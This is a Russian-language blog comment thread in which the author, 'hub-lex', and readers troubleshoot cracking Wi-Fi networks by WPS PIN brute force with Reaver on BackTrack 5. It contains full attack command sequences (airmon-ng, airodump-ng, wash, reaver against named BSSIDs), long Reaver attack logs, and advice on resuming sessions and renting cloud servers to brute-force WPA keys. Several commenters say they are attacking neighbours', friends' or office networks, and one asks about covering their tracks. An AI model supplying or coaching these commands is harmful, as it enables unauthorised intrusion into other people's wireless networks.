F0:7D:68:97:BA:F8 13 -31 1.0 No Infagro Ltd.
и т д. В столбике WPS Locked пишет НО, значит не закрыт. Сигнал от 100% (свой) до 30% (пробовал всех) :О
у кореша пишет:
[+] Waiting for beacon from 4E:D6:7D:83:14:5F
[+] Switching mon0 to channel 5
[+] Associated with 4E:D6:7D:83:14:5F (ESSID: ongbak)
[+] Trying pin 01235678
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] Trying pin 11115670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 11115670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] Trying pin 22225672
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity res
что это?
Дайте больше информации:
- производитель AP
- wi-fi клиент который вы используйте
Попробуйте запустить reaver c оциями “-E -L -T 2″
В некоторых AP используется плохое железо, оно может на это влиять.
Если ничего не выйдет, позвоните Skype: hub-lex-21
Аналогичная проблема.. Разгадка найдена?
Нет. Я перепробовал у друзей, при сигнале не менее 90%, на работе в 2х офисах. При чем с разных ноутов. Дописывал кучу ф-й реавера ( Т L S –no-nacks и т д.) но одно и тоже. Подбор идет, но очень медленно, учитывая кучу лишних запросов и негативных ответов. За 24 часа – 7%…
Здравствуйте! Извиняюсь, если что-то упустил. Сделал BackTrack 5 загрузочный на флешке. Все работает и запускается (reaver-1.4 устанавливается при наличии интернета). А если нет интернета, но есть заранее скаченный reaver-1.4, то гуда поместить папку и как установить в BackTrack 5 (какие набрать команды, если можно с примером). Немного непонятно как установить из исходников.
Компиляции reaver описана в этой статье: http://www.levinkv.ru/ustanovka-reaver-v-backtrack-5-r1/
Если у вас все таки останутся вопросы, пишите или если их много. Тогда можете связаться со мной через skype: hub-lex-21
папка с файлами reaver-1.4 лежит на диске С: как теперь установить reaver-1.4
1. запускаете BT5
2. диски, если не ошибаюсь уже должны быть смонтированы. поэтому открываете терминал или запускаете менеджер
3. находите свой диск С: -> переходите к файлу (можете копировать или запускать от туда, но лучше скопировать в BT5)
4. компилируйте
вот примерно как то так. будут вопросы пишите.
Спасибо. извини а что значит компилируйте?
компиляция программы (читай статью http://www.levinkv.ru/ustanovka-reaver-v-backtrack-5-r1/ с раздела “Установка reaver из исходников”)
p.s.: если что то не понятно, тогда звони skype: hub-lex-21
Доброе время суток! Автору действительно великая благодарность =) у меня вопрос следующего характера… Сделал BackTrack 5 загрузочный на сд.
запустил на машине дошел до выбора мак адреса и номера канала
airodump-ng-c 1 -w wwwq–bssid xxxxxxxx mon0
и он пишет такой команды нет. пробовал несколько раз с разными папками одинаково нет такой команды. в чем можнт быть причина ? заранее благодарен.
Пробелы поставьте. mon0
airodump-ng -c < № канала> -w < имя_файла> –bssid
спасибо! а еще вопрос, папку где сохраняются файлы сам создаешь или выбирать из системных которые уже есть? если сам то где ее помещать ?
По подробнее опишите вопрос.
airodump-ng -c -w –bssid mon0 этот фаил я сам создаю или он где то есть ? если сам создаю то где его разместить ?
То что вы ввели, это команда.
Если вы говорите про *.cap файл, он создается в той директории, в которой вы работайте.
спасибо разобрался =)
# sudo wash -i mon0 –scan
result – [!] Found packet with bad FCS, skipping…
wash -i mon0 -C
result – [!] Found packet with bad FCS, skipping…
Probuem wash -i mon0 -C -s ))) working
не понимаю в чем проблема … скачал reaver-1.3 архив рабочий. но вот отрывать не хочет выдает такие строки…
root@root:~# tar xvfz reaver-1.3.tar.gz
tar: reaver-1.3.tar.gz: Cannot open: No such file or directory
tar: Error is not recoverable: exiting now
tar: Child returned status 2
tar: Exiting with failure status due to previous errors
root@root:~#
что делать ?
Попробуйте зайти в директорию с помощью файлового менеджера; затем правая кнопка мыши и т.д. там сами разберетесь.
На всякий вот статья по tar’y => http://www.levinkv.ru/arhivatsiya-v-linux-komanda-tar/
И зачем вам reaver v1.3 ведь есть v1.4
нашел четвертый поставил тоже самое.. сейчас буду копаться. спасибо.
здравствуйте. подскажите проблему. reaver запустила. но на каком нибудь проценте он застревает. пытается послать только 1 пин (не меняются как вначале). и пишет одно и тоже 10 % готово (79 секунд). как это исправить?? и сразу такой вопрос сохранить процесс можно Ctrl C. но не знаю как возобновить! если набирать команду заново он начнет с нуля.
и подскажите пожалуйста а почему так долго??вот за 5 часов он сделал только 20% уровень сигнала пишет 56%(3 полоски). может стоит попробовать где сигнал выше?на скорость процесса это повлияет??
ждите и не выключайте! все сделается…
Вопрос, ушел с работы – было 40 %, оставил на ночь, процесс сам остановится, или все заново начинать (за 10 часов только 40% – что-то долго)
Ммм…может быть ночью, что то случилось там? Когда вы пришли на работу снова, АР была включена? Т.е. при повторном сканировании она есть?
Вы так же можете сохранить сессию и пойти домой. Прийти на работу и возобновить работу. Таким образом процесс расшифровки будет под вашим контролем. Т.е. вы заметите, есть что то пойдет не так.
О том как сохранить сессию, вы можете прочитать в комментарии от Loman в этой статье.
Сегодня пробовал на другой сети, ушел домой на 92.78%, если сеть пропадет ночью(выключат) а потом появится – процесс продолжится или все заново?Уходя заметил, что номера пин зациклились (повторяются) это нормально? И еще – финал я не проморгаю, когда приду на работу?
На первый вопрос не могу ответить – не проверял такую ситуацию. Сессия все равно останется, так что можно будет начать с останов. момента.
Это нормально, если пин зацикливается.
Нет, будет отображена проделанная работа.
Урааа все получилось!!! взламывал очень медленно аж 12 часов!спасибо вашему сайту! все здорово описано и понятно)) ой а вопрос! вот если за окном вай фай но у него не включен wps следовательно reaver не поможет, что тогда делать??с помощью словаря – эт не реально! потому что надо знать длину пароля.
Пожалуйста, рад что получилось.
Если WPS выключен и шифрование WPA/WPA2, тогда можно попробовать по словарю подобрать. Или же воспользоваться арендой сервера, например Amazon, и попытать грубо подобрать там.
по словарю же например пароль GbHj:jR010112 не получиться подобрать! это я думаю не возможно((хотя в программе wifiway есть генератор паролей но когда ставишь всю кириллицу и все цифры то он сгенерировать не может. он проценты выдает например готово 0,6% а потом спустя полчаса выдает ошибку(( и при взломе по словарю именно WAP2 он когда начинает искать пароль, то комп вырубается. не понимаю почему…а надо поискать генераторы паролей программу, а хотя бесполезно(( надо в них указывать длину пароля. с этим не угадать.
Значит вам еще учиться и учиться =)
Здравствуйте, а не подскажете, как задействовать всю мощь процессора или видюхи? Может быть есть секрет? И как обойтись без обновления?
Секрета не знаю, но думаю что для этого надо разгонять железо.
Но все это не сравниться с арендой сервера на Amazon. Вот там и мощь и скорость))
извиняюсь это наверно глупый вопрос но все же… как Перейти в директорию /src: где ее искать ? есть что почитать а ?
В терминале вводите: cd /src
Почитать рекомендую статьи из раздела: http://www.levinkv.ru/category/linux/
BackTrack 5 R2 = не могу подключится к своей Wi-Fi для закачки reaver. Захожу internet-wicd network manager-выбираю точку доступа-нажимаю properties-выбираю шифрование wep(passphrase) – ввожу пароль 13ти значный код. нажимаю подключить. идёт нормально, останавливается Obdataining IP Address, долго думает, потом выдает ошибку “unable to get ip address” . Точка доступа Dlink. пробоввал вбивать вручную IP 192.168.1.4. Пробовал менять шифрование на WEP HEX Shared/Restricted – пишет Bad Passwords
Хм странно…попробуйте подключиться через LAN.
Кстати говоря, в BackTrack 5 R2 reaver включен в дистрибутив…так что вы делайте лишнее телодвижение.
apt-get update тоже не надо делать? можно сразу к 3 пункту приступать?
Да, но для начала проверьте reaver. В теминале введите reaver. Если не выдаст ошибку, значит к 3-му пункту.
[+] Waiting for beacon from 7C:4F:B5:49:7D:03
[+] Switching mon0 to channel 2
[+] Switching mon0 to channel 3
[+] Switching mon0 to channel 4
[+] Switching mon0 to channel 5
[+] Switching mon0 to channel 6
[+] Switching mon0 to channel 7
[+] Switching mon0 to channel 8
[+] Switching mon0 to channel 9
[+] Switching mon0 to channel 10
[+] Switching mon0 to channel 11
——-по порядку———-
switching mon0 to channel 14
я перечитал в гугле все на эту тему, не чего не понял. Расскажите своими словами, если можно инструкцию
Идет переключение каналов, скорее всего вы не вписали номер используемого канала.
Покажите, какие команды вы вводите, а не только вывод.
iwconfig
airmon-ng start wlan0
airodump-ng mon0
reaver -i mon0 -b 8D:AE:9D:65:1F:B2 -vv
только номер точки доступа которую взламываю
А wash кто будет использовать? => http://www.levinkv.ru/reaver-vzlom-wi-fi-seti/
после команды
wash -i mon0
- не показываются BSSID. WPA2 PSK точка, значит на ней нет WPS ?
Правильно.
распаковал архив с reaver а установить не получается пишет root@root:~# cd /src
bash: cd: /src: No such file or directory что делать ?
No such file or directory – Нет такого файла или директории.
Какую версию BackTrack’a используйте?
Вот статья о том, как установить reaver: http://www.levinkv.ru/ustanovka-reaver-v-backtrack-5-r1/
у меня вопрос а вот выше сказано что надо вставить диск и устоновить reaver и чтоб был подключен к инету. но если ты будешь грузиться с диска когда перезагрузишь комп то как можно подключиться к инету если не загружена систем.
http://ru.wikipedia.org/wiki/Live_CD
Хм странно…попробуйте подключиться через LAN.
Кстати говоря, в BackTrack 5 R2 reaver включен в дистрибутив…так что вы делайте лишнее телодвижение./// если там есть то зачем надо скачевать BT 5 R1 а лучше запихать туда все что нужно и уже грузится с диска. а то я не пойму как все делается и много таких как я лучше по меньше мороки с скачиванием revera и остального.
так про live-cd понел теперь вот я скачал rever на жескии диск в диск С:\ теперь мне что нужно делать.
А в статье что написано?
BackTrack 5 R2 reaver включен в дистрибутив это точно ????
Точно
А есть программа wash для виндовса? или другая для обнаружения именно WPS. Чтобы можно было найти на виндовсе точку с WPS потом уже загрузится с Live-sd и взламывать
Это?
http://download.aircrack-ng.org/aircrack-ng-1.1-win.zip
здраствуйте я попробывал как написано выше все по инструкции все так и зделал.у меня BT 5 R1 и к инету был подключен через WEB но у меня reaver не скачевается. и выдает вот reaver:command not found.
может лучше скачать BT 5 R2. там говорят что есть уже reaver.что делат подскажите зарание блогодарен.
BSSID Channel RSSI WPS Version WPS Locked ESSID
—————————————————————————————————————
38:83:45:C8:3D:08 1 -86 1.0 No svita
C8:3A:35:3F:56:C8 1 -85 1.0 No Tenda_3F56C8
38:83:45:E8:64:C0 1 -100 1.0 No MERCURY_E864C0
что означает WPS Locked No ?? начинаю сканировать с помощью рева выдает что то невразумительное
[+] Waiting for beacon from B0:48:7A:29:5E:2A
[+] Switching mon0 to channel 1
[+] Associated with B0:48:7A:29:5E:2A (ESSID: TP-LINK_295E2A)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 00005678
[+] Sending EAPOL START request
[+] Received identity request
и это продолжается по без остановки…
набирал команды
iwconfig
airmon-ng start wlan0
airodump-ng mon0
wash -i mon0
reaver -i mon0 -b 8D:AE:9D:65:1F:B2 -vv
и получилось вот это… что сделал не так ?
timon, zooz правильно вам подсказывает
А что не устраивает, подбор же идет?
просто на скриншотах http://www.levinkv.ru/reaver-vzlom-wi-fi-seti/ вот тут.. процесс выглядит иначе.. да и не показывает процент обработки информации… это то и смутило. тоесть так и должно быть ?
Я специально так сделал, чтобы не выводилась всякая хрень.
Да, процесс идет. Так что ждите.
Буду признателен за ответ, ситуация следующая, мною была вскрыта точка WPA с помощью reaver после чего был сменен пасс, пин точки мне известен. Можно ли при последующем подборе ключа указать что пин известен и указать его если да, то сократит ли это время подбора ключа? backtrack 5 r2 alfa awus036
reaver как раз и делает, что ищет pin-код. Если он вам уже известен, тогда просто вводите команду с pin-кодом и получаете ключ от сети.
reaver -i mon0 -b xx:xx:xx:xx:xx:xx –pin=XXXX
Данная команда выдала ошибку не правильный пин.Тот пин который был найден reaver`ом в прошлый раз не подошел, я думал данный пин который он находит это тот который написан на нижней части AP
Вы должны использовать тот пин который нашел reaver.
Спасибо попытаюсь. И еще вопрос как посмотреть не сканирует ли кто нибудь мою сеть, возможно где-то остаются следы.
Все следы остаются в логах, если они включены у вас на точке доступа. Также можно воспользоваться например nagios.
Что есть для Windows систем, понятия не имею. Так как у меня все работает на *nix.
А где бы поподробнее ознокомится с материалом с самозащитой и конспирацией? Еще хотелось бы чуть лучше понимать сам принцип работы того же рива. Такто гуд когда получается, но ща хочется уже чуть больше понимать.
звони в skype: hub-lex-21
у меня вопрос вот я скачал BT 5 R2 мне все по инструкции надо делать или нужно еще что то туда добавить там надпись какую или не надо.
Вроде бы ничего больше не надо. Делайте все по инструкции. Если что пишите.
скажите пожалуйста какие команды использовать. можно написать все команды шаг за шагом а то я прочитал коменты там говорят про wash и scan команды. напишите пожалуйста все команды которые нужно водить. зарание блогодарен.
Делайте все, как написано. Жедательно, чтобы вы понимали то, что вы вводите.
Плюс сначала прочитайте http://www.levinkv.ru/reaver-vzlom-wi-fi-seti/
И посмотрите видео в этой статье.
Сначала разберите материал, поймите его, а уж потом вламывайте.
спасибо
Have fun!
Спасибо! наконец-то взломал сеть, 4 суток заняла процедура!!!)))
Пожалуйста)
Если вам понравились статьи, тогда подпишитесь на рассылку по E-mail или RSS, чтобы не пропустить выход нового материала.
на загрузочной флэшке BT 5 R2
не могу понять почему при запуске
reaver -i mon0 -b 00:0B:2B:72:01:11 -vv
при скане пинов остаются неизменными 1234, и в самом начале перебора уже выполнено 91 % ???
…
[+] Sending WSC NACK
[+] Trying pin 12340019
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] 91.01% complete @ 2012-03-16 13:48:37 (2 seconds/pin)
[+] Trying pin 12340026
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] Trying pin 12340033
[+] Sending EAPOL START request
…
Все нормально, это частая ситуация, когда reaver перебирает один и тот же pin, Т.ч. ждите.
забыл написать, доходит до конца 12349989 и начинает его перебирать зациклившись, оставлял часов на 14, ситуация не изменялась, и все таки почему начинает с 91 %, я так и не понял
ломал свою точку, с подстановкой первых четырех цифр – ломает, а по другому не получается, не перебирает первые 4 цифры
пример
reaver -i mon0 -b 00:0B:2B:72:01:11 -vv –pin=5639
skype: hub-lex-21
hub-lex, привет, та же проблема(начинает с 93%, доходит до 12349834 и идет одно и то же), и еще вопрос: почему начинает перебор pin с 1234?
Спасибо за терпение.
1234 одна из частей общего пина – “It has been reported that some models/vendors/ISPs all come configured with a default pin. Common pins are 12345670, 00005678, 01230000, etc. Reaver attempts known default pins first.”
Спасибо, понял.
вам всем наверное надо ссылку сразу скидывать или тексты без перевода =DD
сразу все понятно и вопросов больше нет =DDD
Уважаемый Hub не подскажите почему BT хорошо работает с флешкой, а с VM не хочет работать. Есть мнение, что VM невидит беспроводную карту.
root@bt:~# airmon-ng start wlan0
Found 1 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
PID Name
4369 dhclient3
Interface Chipset Driver
http://www.linuxquestions.org/questions/linux-newbie-8/how-can-i-connect-to-my-wireless-spot-from-backtrack-4-on-vmware-741331/
А можно ли одновременно ломать несколько точек?
скачал BT 5 R2 и по написанному все сделал =)работал около 40 минут…вроде получилось выдал WPS PIN: ’4150хххх .
[+] WPA PSK:47b12d700d90ххххххххххх .
что с этим делать ? ввожу как пароль неопознает ни по первому WPS PIN ни по второму WPA PSK… в чем может быть причина ? или ввожу не там ?
Как сохранить сессию, что б продолжить на следующий день?
Какой ОС вы пользуйтесь?
BackTrack 5 R2 на USB
Сессия reaver’a сохраняется.
Разделы диска автомонтируются.
Следовательно создать папку в разделе диска C:\ и складывать сессии туда.
А я пользуюсь BT5R2 на диске DVD. Спасибо, благодаря вашей статье все получается. Дома нет проблем. А вот на работе, оставить комп работать на долго не могу, а потому, хотелось бы заставить ривер писать сесси на винт. Можете расписать эту процедуру по подробнее?
Думаю в след. статье это опишу.
Спасибо, а когда ждать7 Или может где-то еще поискать?
В принципе, наверное есть у ривер команда куда сохранять своп. Или, вот надо подумать на счет установки ривер из под бэктрака сразу на винт, тогда она там свопиться и будет. Нет?
Мне кажется это не лучший способ =)
В статье все будет написано, как и что делать.
p.s.: оформляйте подписку, чтобы следить за выходом новых статей
На днях выйдет. Можете поискать в google. Желательно смотреть на зарубежные сайты.
Уважаемый hub-lex, а какой vm вы пользуетесь. Походу vm не видит вайфай адаптера. Поэтому приходится пользоваться либо livecd или flash. Или посоветуйте как настроить ВМ ?
По поводу настройки VM ничего сказать не могу. Я сам, когда дело умею с Wi-Fi пользуюсь Life-USB.
Zdravstvuite hab-lex.U menia takoi vopros.Ia polzuius BT5 R2,psle pervogo shaga,a imenno posleНаконец, BackTrack загружается в командной строке. Когда Вы увидите в строке курсор, введите команду startx и нажмите Enter. Tak vot,u menia vyvodit na stroke ne (root@root:~#) a kakoe-to (root@bt:~#),ia uzhe vtoroi den’,kak ne mogu rozobratsia kak s etoi problemoi.Posledniaia nadezhda na vas.
Вас смущает запись? Или как?
Если запись, тогда не обращайте на нее внимание. Просто вводите команды, как в статье.
Net menia pri etom vydaet:
W: some index files filed to download,they have been ignored,or oldones used instead
Toest` ne daet deistvovat dalshe.Mozhet ia vvel kakuiu to ne tu komandu,ili tipa togo?
Приведите примеры команд, которые вы вводили. Желательно поэтапно.
Chestno govoria ,ia i sam ne ponial kak eto vyshlo.
No zato rozobralsia,chto u menia kak ne stranno dlia BT5 R2 Gnome 64 ne ustonavlivaetsia reaver,pri tom chto,on prisuctvuet v nabore.I problema ostaetsia s apt-get update :???:
Если вы, человек который делал, не понимаете что и как произошло. Тогда я уж тем более. Не могу вам помочь, если вы так и будете ходить вокруг да около.
Приведите примеры команд, которые вы вводили.
В чем проблема на конкретном шаге. Какие команды вы вводили и т.п.
Такая проблема, когда прописываю команду airmon-ng start wlan1(примерно). то прописывает все что выше, у драйвера(как на картинке) пишет (monitor mode enabled) и все. ни mon0 ни еще каких нет.
Дайте вывод команды lspci
00:00.0 Host bridge: Advanced Micro Devices [AMD] Device 1510
00:01.0 VGA compatible controller: ATI Technologies Inc Device 9804
00:01.1 Audio device: ATI Technologies Inc Device 1314
00:11.0 SATA controller: ATI Technologies Inc SB700/SB800 SATA Controller [AHCI mode]
00:12.0 USB Controller: ATI Technologies Inc SB700/SB800 USB OHCI0 Controller
00:12.2 USB Controller: ATI Technologies Inc SB700/SB800 USB EHCI Controller
00:13.0 USB Controller: ATI Technologies Inc SB700/SB800 USB OHCI0 Controller
00:13.2 USB Controller: ATI Technologies Inc SB700/SB800 USB EHCI Controller
00:14.0 SMBus: ATI Technologies Inc SBx00 SMBus Controller (rev 42)
00:14.2 Audio device: ATI Technologies Inc SBx00 Azalia (Intel HDA) (rev 40)
00:14.3 ISA bridge: ATI Technologies Inc SB700/SB800 LPC host controller (rev 40)
00:14.4 PCI bridge: ATI Technologies Inc SBx00 PCI to PCI Bridge (rev 40)
00:15.0 PCI bridge: ATI Technologies Inc Device 43a0
00:15.2 PCI bridge: ATI Technologies Inc Device 43a2
00:15.3 PCI bridge: ATI Technologies Inc Device 43a3
00:18.0 Host bridge: Advanced Micro Devices [AMD] Device 1700 (rev 43)
00:18.1 Host bridge: Advanced Micro Devices [AMD] Device 1701
00:18.2 Host bridge: Advanced Micro Devices [AMD] Device 1702
00:18.3 Host bridge: Advanced Micro Devices [AMD] Device 1703
00:18.4 Host bridge: Advanced Micro Devices [AMD] Device 1704
00:18.5 Host bridge: Advanced Micro Devices [AMD] Device 1718
00:18.6 Host bridge: Advanced Micro Devices [AMD] Device 1716
00:18.7 Host bridge: Advanced Micro Devices [AMD] Device 1719
06:00.0 Ethernet controller: Atheros Communications AR8152 v2.0 Fast Ethernet (rev c1)
07:00.0 Network controller: Broadcom Corporation Device 4727 (rev 01)
это нетбук+ вайфай адаптер
Хорошо, а теперь воткните свой wifi адаптер в ноутбук и покажите вывод еще раз.
Так в том-то и дело что это с воткнутым вайфай адаптером
Попробуйте так – http://www.calculate-linux.org/boards/16/topics/10729
Если не получится, тогда – https://www.google.ru/#hl=ru&newwindow=1&output=search&sclient=psy-ab&q=Network+controller:+Broadcom+Corporation+Device+4727&oq=Network+controller:+Broadcom+Corporation+Device+4727&aq=f&aqi=g2&aql=&gs_l=hp.3..0l2.665l665l0l1464l1l1l0l0l0l0l152l152l0j1l1l0.frgbld.&pbx=1&bav=on.2,or.r_gc.r_pw.r_cp.r_qf.,cf.osb&fp=45ddeb5f6772cf89&biw=1366&bih=677
Skazhu vam chestno,ia v etom dele kak govoriat chainik,poetomu spasibo za udelennoe vremia i terpenie.
Doshel do togo gde avtor vvodit komandu apt-get updat.Dal?she mne vydaet.
W: some index files filed to download,they have been ignored,or old ones used instead.
Ia dumaiu,chto mozhet che-to ne to sluchaino nazhal.Vrode bol?she nekuda bylo zahodit.
Позвоните мне в skype: hub-lex-21
что на счет сохранения сессии Reaver??? очень хочется почитать… статья есть или только будет ?
заранее ОГРОМНОЕ спасибо =)
Статья только будет. Сейчас идет работа над другими статьями, как мне кажется они будут интересными. А статья по Reaver FAQ, которая будет включать сохранение сессии и т.п. будет готова на след. неделе. Так что подписывайся на рассылку, чтобы следить за выходом новых статей.
у меня вот такая проблема помогите
[+] Waiting for beacon from 00:0B:2B:42:CC:F1
[+] Switching mon0 to channel 1
[+] Associated with 00:0B:2B:42:CC:F1 (ESSID: ACORP)
Дальше ничего не происходит.
Покажите команды, которые вводили и их вывод.
Спасибо за статью Hub-lex! У меня есть 4 сети которые можно крякнуть (по wash). Первая поддалась на ура!6 часов -пароль в кармане. А вот другие ведут себя странным образом: одна, пропускает один пароль потом исчезает вообще из сети. дальше идёт сканирование( минуты две-три) опять пропадает и заново её поиск по всем каналам и заново… вторая из канала не исчезает ,а берёт тайм-аут то-же гдето на минуту… скорость за 8 часов : 5%. Сигнал от всех сетей устойчивый и 65%. Посоветуйте что делать, как можно ускориться. А так-же как можно записать сессию reaver на внешний накопитель. если можно то прям покомандно. СПАСИБО! Статья СУПЕР!!!!
Рад что нравится)
Что говорит wash по поводу других сетей? Покажите вывод.
По поводу сессии будет позже рассказано в статье Reaver FAQ, которая готовится.
root@bt:~# sudo wash -i mon0
Wash v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner
BSSID Channel RSSI WPS Version WPS Locked ESSID
—————————————————————————————————————
BC:AE:C5:88:5A:BA 1 -103 1.0 No ASUS
F0:7D:68:9A:89:C2 4 -90 1.0 No dlink
84:C9:B2:6E:01:57 5 -95 1.0 No ol_84
1C:7E:E5:0A:72:7F 6 -94 1.0 No Domolink_Home
F0:7D:68:95:65:82 11 -95 1.0 No DMITRY-Network
a vydaet vot chto
BSSID Channel RSSI WPS Version WPS Locked ESSID
—————————————————————————————————————
BC:AE:C5:88:5A:BA 1 -103 1.0 No ASUS
F0:7D:68:9A:89:C2 4 -90 1.0 No dlink
84:C9:B2:6E:01:57 5 -95 1.0 No ol_84
1C:7E:E5:0A:72:7F 6 -94 1.0 No Domolink_Home
F0:7D:68:95:65:82 11 -95 1.0 No DMITRY-Network
^C
root@bt:~# reaver -i mon0 -b F0:7D:68:95:65:82 -vv
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner
[+] Waiting for beacon from F0:7D:68:95:65:82
[+] Switching mon0 to channel 1
[+] Switching mon0 to channel 2
[+] Switching mon0 to channel 3
[+] Switching mon0 to channel 4
[+] Switching mon0 to channel 5
[+] Switching mon0 to channel 6
[+] Switching mon0 to channel 7
[+] Switching mon0 to channel 8
[+] Switching mon0 to channel 9
[+] Switching mon0 to channel 10
[+] Switching mon0 to channel 11
[+] Associated with F0:7D:68:95:65:82 (ESSID: DMITRY-Network)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0×02), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0×02), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0×03), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0×02), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0×02), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0×02), re-trying last pin
[+] Nothing done, nothing to save.
[+] 0.00% complete @ 2012-04-05 07:45:09 (0 seconds/pin)
[+] Trying pin 12345670
[+] Switching mon0 to channel 12
[+] Switching mon0 to channel 13
[+] Switching mon0 to channel 14
[+] Switching mon0 to channel 1
[+] Switching mon0 to channel 2
[+] Switching mon0 to channel 3
[+] Switching mon0 to channel 4
[+] Switching mon0 to channel 5
[+] Switching mon0 to channel 6
[+] Switching mon0 to channel 7
[+] Switching mon0 to channel 8
[+] Switching mon0 to channel 9
[+] Switching mon0 to channel 10
[+] Switching mon0 to channel 11
[+] Switching mon0 to channel 12
[+] Switching mon0 to channel 13
[+] Switching mon0 to channel 14
[+] Switching mon0 to channel 1
[+] Switching mon0 to channel 2
[+] Switching mon0 to channel 3
[+] Switching mon0 to channel 4
[+] Switching mon0 to channel 5
[+] Switching mon0 to channel 6
[+] Switching mon0 to channel 7
[+] Switching mon0 to channel 8
[+] Switching mon0 to channel 9
[+] Switching mon0 to channel 10
[+] Switching mon0 to channel 11
[+] Switching mon0 to channel 12
[+] Switching mon0 to channel 13
[+] Switching mon0 to channel 14
[+] Switching mon0 to channel 1
[+] Switching mon0 to channel 2
[+] Switching mon0 to channel 3
[+] Switching mon0 to channel 4
[+] Switching mon0 to channel 5
[+] Switching mon0 to channel 6
[+] Switching mon0 to channel 7
[+] Switching mon0 to channel 8
[+] Switching mon0 to channel 9
[+] Switching mon0 to channel 10
[+] Switching mon0 to channel 11
[+] Switching mon0 to channel 12
[+] Switching mon0 to channel 13
[+] Switching mon0 to channel 14
[+] Switching mon0 to channel 1
[+] Switching mon0 to channel 2
[+] Switching mon0 to channel 3
[+] Switching mon0 to channel 4
[+] Switching mon0 to channel 5
[+] Switching mon0 to channel 6
[+] Switching mon0 to channel 7
[+] Switching mon0 to channel 8
[+] Switching mon0 to channel 9
[+] Switching mon0 to channel 10
[+] Switching mon0 to channel 11
[+] Switching mon0 to channel 12
[+] Switching mon0 to channel 13
[+] Switching mon0 to channel 14
[+] Switching mon0 to channel 1
[+] Switching mon0 to channel 2
[+] Switching mon0 to channel 3
[+] Switching mon0 to channel 4
[+] Switching mon0 to channel 5
[+] Switching mon0 to channel 6
[+] Switching mon0 to channel 7
[+] Switching mon0 to channel 8
[+] Switching mon0 to channel 9
[+] Switching mon0 to channel 10
[+] Switching mon0 to channel 11
[+] Switching mon0 to channel 12
[+] Switching mon0 to channel 13
[+] Switching mon0 to channel 14
[+] Switching mon0 to channel 1
[+] Switching mon0 to channel 2
[+] Switching mon0 to channel 3
[+] Switching mon0 to channel 4
[+] Switching mon0 to channel 5
[+] Switching mon0 to channel 6
[+] Switching mon0 to channel 7
[+] Switching mon0 to channel 8
[+] Switching mon0 to channel 9
[+] Switching mon0 to channel 10
[+] Switching mon0 to channel 11
[+] Switching mon0 to channel 12
[+] Switching mon0 to channel 13
[+] Switching mon0 to channel 14
[+] Switching mon0 to channel 1
[+] Switching mon0 to channel 2
[+] Switching mon0 to channel 3
[+] Switching mon0 to channel 4
[+] Switching mon0 to channel 5
[+] Switching mon0 to channel 6
[+] Switching mon0 to channel 7
[+] Switching mon0 to channel 8
[+] Switching mon0 to channel 9
[+] Switching mon0 to channel 10
[+] Switching mon0 to channel 11
[+] Switching mon0 to channel 12
[+] Switching mon0 to channel 13
[+] Switching mon0 to channel 14
[+] Switching mon0 to channel 1
[+] Switching mon0 to channel 2
[+] Switching mon0 to channel 3
[+] Switching mon0 to channel 4
[+] Switching mon0 to channel 5
[+] Switching mon0 to channel 6
[+] Switching mon0 to channel 7
[+] Switching mon0 to channel 8
[+] Switching mon0 to channel 9
